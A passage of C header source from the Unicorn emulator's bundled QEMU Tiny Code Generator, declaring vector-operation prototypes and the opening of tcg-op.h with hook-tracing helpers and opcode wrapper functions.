TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); void tcg_gen_gvec_4_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_4_ptr *fn); typedef void gen_helper_gvec_5_ptr(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); void tcg_gen_gvec_5_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t eofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_5_ptr *fn); /* Expand a gvec operation. Either inline or out-of-line depending on the actual vector size and the operations supported by the host. */ typedef struct { /* Expand inline as a 64-bit or 32-bit integer. Only one of these will be non-NULL. */ void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64); void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32); /* Expand inline with a host vector type. */ void (*fniv)(TCGContext *, unsigned, TCGv_vec, TCGv_vec); /* Expand out-of-line helper w/descriptor. */ gen_helper_gvec_2 *fno; /* The optional opcodes, if any, utilized by .fniv. */ const TCGOpcode *opt_opc; /* The data argument to the out-of-line helper. */ int32_t data; /* The vector element size, if applicable. */ uint8_t vece; /* Prefer i64 to v64. */ bool prefer_i64; } GVecGen2; typedef struct { /* Expand inline as a 64-bit or 32-bit integer. Only one of these will be non-NULL. */ void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64, int64_t); void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32, int32_t); /* Expand inline with a host vector type. */ void (*fniv)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, int64_t); /* Expand out-of-line helper w/descriptor, data in descriptor. */ gen_helper_gvec_2 *fno; /* Expand out-of-line helper w/descriptor, data as argument. */ gen_helper_gvec_2i *fnoi; /* The optional opcodes, if any, utilized by .fniv. */ const TCGOpcode *opt_opc; /* The vector element size, if applicable. */ uint8_t vece; /* Prefer i64 to v64. */ bool prefer_i64; /* Load dest as a 3rd source operand. */ bool load_dest; } GVecGen2i; typedef struct { /* Expand inline as a 64-bit or 32-bit integer. Only one of these will be non-NULL. */ void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64); void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32); /* Expand inline with a host vector type. */ void (*fniv)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec); /* Expand out-of-line helper w/descriptor. */ gen_helper_gvec_2i *fno; /* The optional opcodes, if any, utilized by .fniv. */ const TCGOpcode *opt_opc; /* The data argument to the out-of-line helper. */ uint32_t data; /* The vector element size, if applicable. */ uint8_t vece; /* Prefer i64 to v64. */ bool prefer_i64; /* Load scalar as 1st source operand. */ bool scalar_first; } GVecGen2s; typedef struct { /* Expand inline as a 64-bit or 32-bit integer. Only one of these will be non-NULL. */ void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64); void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32); /* Expand inline with a host vector type. */ void (*fniv)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec); /* Expand out-of-line helper w/descriptor. */ gen_helper_gvec_3 *fno; /* The optional opcodes, if any, utilized by .fniv. */ const TCGOpcode *opt_opc; /* The data argument to the out-of-line helper. */ int32_t data; /* The vector element size, if applicable. */ uint8_t vece; /* Prefer i64 to v64. */ bool prefer_i64; /* Load dest as a 3rd source operand. */ bool load_dest; } GVecGen3; typedef struct { /* * Expand inline as a 64-bit or 32-bit integer. Only one of these will be * non-NULL. */ void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, int64_t); void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, int32_t); /* Expand inline with a host vector type. */ void (*fniv)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec, int64_t); /* Expand out-of-line helper w/descriptor, data in descriptor. */ gen_helper_gvec_3 *fno; /* The optional opcodes, if any, utilized by .fniv. */ const TCGOpcode *opt_opc; /* The vector element size, if applicable. */ uint8_t vece; /* Prefer i64 to v64. */ bool prefer_i64; /* Load dest as a 3rd source operand. */ bool load_dest; } GVecGen3i; typedef struct { /* Expand inline as a 64-bit or 32-bit integer. Only one of these will be non-NULL. */ void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_i64); void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, TCGv_i32); /* Expand inline with a host vector type. */ void (*fniv)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec, TCGv_vec); /* Expand out-of-line helper w/descriptor. */ gen_helper_gvec_4 *fno; /* The optional opcodes, if any, utilized by .fniv. */ const TCGOpcode *opt_opc; /* The data argument to the out-of-line helper. */ int32_t data; /* The vector element size, if applicable. */ uint8_t vece; /* Prefer i64 to v64. */ bool prefer_i64; /* Write aofs as a 2nd dest operand. */ bool write_aofs; } GVecGen4; void tcg_gen_gvec_2(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, const GVecGen2 *); void tcg_gen_gvec_2i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, int64_t c, const GVecGen2i *); void tcg_gen_gvec_2s(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, TCGv_i64 c, const GVecGen2s *); void tcg_gen_gvec_3(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz, const GVecGen3 *); void tcg_gen_gvec_3i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz, int64_t c, const GVecGen3i *); void tcg_gen_gvec_4(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t maxsz, const GVecGen4 *); /* Expand a specific vector operation. */ void tcg_gen_gvec_mov(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_not(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_neg(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_abs(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_add(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_sub(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_mul(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_addi(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_muli(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_adds(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_subs(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_muls(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz); /* Saturated arithmetic. */ void tcg_gen_gvec_ssadd(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_sssub(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_usadd(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_ussub(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); /* Min/max. */ void tcg_gen_gvec_smin(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_umin(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_smax(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_umax(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_and(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_or(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_xor(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_andc(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_orc(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_nand(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_nor(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_eqv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_andi(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_xori(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_ori(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_ands(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_xors(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_ors(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_dup_mem(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t s, uint32_t m); void tcg_gen_gvec_dup_i32(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t s, uint32_t m, TCGv_i32); void tcg_gen_gvec_dup_i64(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t s, uint32_t m, TCGv_i64); void tcg_gen_gvec_dup8i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t s, uint32_t m, uint8_t x); void tcg_gen_gvec_dup16i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t s, uint32_t m, uint16_t x); void tcg_gen_gvec_dup32i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t s, uint32_t m, uint32_t x); void tcg_gen_gvec_dup64i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t s, uint32_t m, uint64_t x); void tcg_gen_gvec_shli(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t shift, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_shri(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t shift, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_sari(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t shift, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_shls(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i32 shift, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_shrs(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i32 shift, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_sars(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i32 shift, uint32_t oprsz, uint32_t maxsz); /* * Perform vector shift by vector element, modulo the element size. * E.g. D[i] = A[i] << (B[i] % (8 << vece)). */ void tcg_gen_gvec_shlv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_shrv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_sarv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_cmp(TCGContext *tcg_ctx, TCGCond cond, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); /* * Perform vector bit select: d = (b & a) | (c & ~a). */ void tcg_gen_gvec_bitsel(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t maxsz); /* * 64-bit vector operations. Use these when the register has been allocated * with tcg_global_mem_new_i64, and so we cannot also address it via pointer. * OPRSZ = MAXSZ = 8. */ void tcg_gen_vec_neg8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a); void tcg_gen_vec_neg16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a); void tcg_gen_vec_neg32_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a); void tcg_gen_vec_add8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void tcg_gen_vec_add16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void tcg_gen_vec_add32_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void tcg_gen_vec_sub8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void tcg_gen_vec_sub16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void tcg_gen_vec_sub32_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void tcg_gen_vec_shl8i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t); void tcg_gen_vec_shl16i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t); void tcg_gen_vec_shr8i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t); void tcg_gen_vec_shr16i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t); void tcg_gen_vec_sar8i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t); void tcg_gen_vec_sar16i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t); #endif ������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/tcg/tcg-op.h�������������������������������������������������������������0000664�0000000�0000000�00000175571�14675241067�0017735�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef TCG_TCG_OP_H #define TCG_TCG_OP_H #include "tcg.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" static inline void gen_uc_tracecode(TCGContext *tcg_ctx, int32_t size, int32_t type, void *uc, uint64_t pc) { TCGv_i32 tsize = tcg_const_i32(tcg_ctx, size); TCGv_i32 ttype; TCGv_ptr tuc = tcg_const_ptr(tcg_ctx, uc); TCGv_i64 tpc = tcg_const_i64(tcg_ctx, pc); TCGv_ptr tdata; uc_engine* puc = uc; struct list_item *cur; struct hook* hk; TCGTemp* args[] = { tcgv_ptr_temp(tcg_ctx, tuc), tcgv_i64_temp(tcg_ctx, tpc), tcgv_i32_temp(tcg_ctx, tsize), 0 }; const int hook_type = type & UC_HOOK_IDX_MASK; if (puc->hooks_count[hook_type] == 1) { cur = puc->hook[hook_type].head; while (cur) { hk = cur->data; if (!hk->to_delete) { tdata = tcg_const_ptr(tcg_ctx, hk->user_data); args[3] = tcgv_ptr_temp(tcg_ctx, tdata); puc->add_inline_hook(uc, hk, (void**)args, 4); tcg_temp_free_ptr(tcg_ctx, tdata); } cur = cur->next; } } else { ttype = tcg_const_i32(tcg_ctx, type); gen_helper_uc_tracecode(tcg_ctx, tsize, ttype, tuc, tpc); tcg_temp_free_i32(tcg_ctx, ttype); } tcg_temp_free_i64(tcg_ctx, tpc); tcg_temp_free_ptr(tcg_ctx, tuc); tcg_temp_free_i32(tcg_ctx, tsize); } static inline void gen_uc_traceopcode(TCGContext *tcg_ctx, void* hook, TCGv_i64 arg1, TCGv_i64 arg2, uint32_t size, void *uc, uint64_t pc) { TCGv_ptr thook = tcg_const_ptr(tcg_ctx, hook); TCGv_ptr tuc = tcg_const_ptr(tcg_ctx, uc); TCGv_i64 tpc = tcg_const_i64(tcg_ctx, pc); TCGv_i32 tsz = tcg_const_i32(tcg_ctx, size); // #if TARGET_LONG_BITS == 32 // TCGv_i64 targ1 = temp_tcgv_i64(tcg_ctx, tcgv_i32_temp(tcg_ctx, arg1)); // TCGv_i64 targ2 = temp_tcgv_i64(tcg_ctx, tcgv_i32_temp(tcg_ctx, arg2)); // #else // TCGv_i64 targ1 = arg1; // TCGv_i64 targ2 = arg2; // #endif gen_helper_uc_traceopcode(tcg_ctx, thook, arg1, arg2, tsz, tuc, tpc); tcg_temp_free_i32(tcg_ctx, tsz); tcg_temp_free_i64(tcg_ctx, tpc); tcg_temp_free_ptr(tcg_ctx, tuc); tcg_temp_free_ptr(tcg_ctx, thook); } /* Basic output routines. Not for general consumption. */ void tcg_gen_op1(TCGContext *tcg_ctx, TCGOpcode, TCGArg); void tcg_gen_op2(TCGContext *tcg_ctx, TCGOpcode, TCGArg, TCGArg); void tcg_gen_op3(TCGContext *tcg_ctx, TCGOpcode, TCGArg, TCGArg, TCGArg); void tcg_gen_op4(TCGContext *tcg_ctx, TCGOpcode, TCGArg, TCGArg, TCGArg, TCGArg); void tcg_gen_op5(TCGContext *tcg_ctx, TCGOpcode, TCGArg, TCGArg, TCGArg, TCGArg, TCGArg); void tcg_gen_op6(TCGContext *tcg_ctx, TCGOpcode, TCGArg, TCGArg, TCGArg, TCGArg, TCGArg, TCGArg); void vec_gen_2(TCGContext *tcg_ctx, TCGOpcode, TCGType, unsigned, TCGArg, TCGArg); void vec_gen_3(TCGContext *tcg_ctx, TCGOpcode, TCGType, unsigned, TCGArg, TCGArg, TCGArg); void vec_gen_4(TCGContext *tcg_ctx, TCGOpcode, TCGType, unsigned, TCGArg, TCGArg, TCGArg, TCGArg); static inline void tcg_gen_op1_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1) { tcg_gen_op1(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1)); } static inline void tcg_gen_op1_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1) { tcg_gen_op1(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1)); } static inline void tcg_gen_op1i(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1) { tcg_gen_op1(tcg_ctx, opc, a1); } static inline void tcg_gen_op2_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2) { tcg_gen_op2(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2)); } static inline void tcg_gen_op2_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2) { tcg_gen_op2(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2)); } static inline void tcg_gen_op2i_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGArg a2) { tcg_gen_op2(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), a2); } static inline void tcg_gen_op2i_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGArg a2) { tcg_gen_op2(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), a2); } static inline void tcg_gen_op2ii(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1, TCGArg a2) { tcg_gen_op2(tcg_ctx, opc, a1, a2); } static inline void tcg_gen_op3_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3) { tcg_gen_op3(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3)); } static inline void tcg_gen_op3_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3) { tcg_gen_op3(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3)); } static inline void tcg_gen_op3i_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGArg a3) { tcg_gen_op3(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), a3); } static inline void tcg_gen_op3i_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGArg a3) { tcg_gen_op3(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), a3); } static inline void tcg_gen_ldst_op_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 val, TCGv_ptr base, TCGArg offset) { tcg_gen_op3(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, val), tcgv_ptr_arg(tcg_ctx, base), offset); } static inline void tcg_gen_ldst_op_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 val, TCGv_ptr base, TCGArg offset) { tcg_gen_op3(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, val), tcgv_ptr_arg(tcg_ctx, base), offset); } static inline void tcg_gen_op4_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGv_i32 a4) { tcg_gen_op4(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), tcgv_i32_arg(tcg_ctx, a4)); } static inline void tcg_gen_op4_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGv_i64 a4) { tcg_gen_op4(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), tcgv_i64_arg(tcg_ctx, a4)); } static inline void tcg_gen_op4i_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGArg a4) { tcg_gen_op4(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), a4); } static inline void tcg_gen_op4i_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGArg a4) { tcg_gen_op4(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), a4); } static inline void tcg_gen_op4ii_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGArg a3, TCGArg a4) { tcg_gen_op4(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), a3, a4); } static inline void tcg_gen_op4ii_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGArg a3, TCGArg a4) { tcg_gen_op4(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), a3, a4); } static inline void tcg_gen_op5_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGv_i32 a4, TCGv_i32 a5) { tcg_gen_op5(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), tcgv_i32_arg(tcg_ctx, a4), tcgv_i32_arg(tcg_ctx, a5)); } static inline void tcg_gen_op5_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGv_i64 a4, TCGv_i64 a5) { tcg_gen_op5(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), tcgv_i64_arg(tcg_ctx, a4), tcgv_i64_arg(tcg_ctx, a5)); } static inline void tcg_gen_op5i_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGv_i32 a4, TCGArg a5) { tcg_gen_op5(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), tcgv_i32_arg(tcg_ctx, a4), a5); } static inline void tcg_gen_op5i_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGv_i64 a4, TCGArg a5) { tcg_gen_op5(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), tcgv_i64_arg(tcg_ctx, a4), a5); } static inline void tcg_gen_op5ii_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGArg a4, TCGArg a5) { tcg_gen_op5(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), a4, a5); } static inline void tcg_gen_op5ii_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGArg a4, TCGArg a5) { tcg_gen_op5(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), a4, a5); } static inline void tcg_gen_op6_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGv_i32 a4, TCGv_i32 a5, TCGv_i32 a6) { tcg_gen_op6(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, 